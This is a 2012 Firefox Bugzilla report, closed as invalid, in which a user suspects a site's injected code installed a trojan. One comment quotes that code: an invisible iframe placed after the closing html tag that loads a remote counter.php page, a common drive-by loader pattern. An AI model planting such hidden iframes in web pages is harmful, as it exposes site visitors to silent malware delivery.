Last Comment Bug 760894 - firefox 12.0 got hacked. i visited site, site had weird code, installed software
: firefox 12.0 got hacked. i visited site, site had weird code, installed software
Status: RESOLVED INVALID
:
Product: Firefox
Classification: Client Software
Component: Untriaged (show other bugs)
: 12 Branch
: x86 Windows 7
: -- normal (vote)
: ---
Assigned To: Nobody; OK to take it and work on it
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-06-02 21:18 PDT by nathan
Modified: 2012-06-15 07:16 PDT (History)
2 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments

Description nathan 2012-06-02 21:18:31 PDT
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725

Steps to reproduce:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Actual results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Expected results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now
Comment 1 Ludovic Hirlimann [:Usul] 2012-06-05 04:56:27 PDT
</html><iframe src="http://proxyrental.net/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Is the code in question - I don't see an attack vector here. removing the security flag.
Comment 2 nathan 2012-06-05 20:56:45 PDT
> Is the code in question - I don't see an attack vector here.

It is an attack vector. The link I posted shows that code is the implementation of a mass hack. Note iframe is installed below /html

counter.php code is loading browser detecting exploit code of some kindof I would suspect. It installed a trojan somehow
Comment 3 [On PTO until 6/29] 2012-06-15 07:16:07 PDT
This is not a Firefox bug. All kinds of sites get infected with malware all of the time. There is nothing for us to do here unless you have a pointer to a way that code is being installed into/through Firefox without you doing anything.

Note You need to log in before you can comment on or make changes to this bug.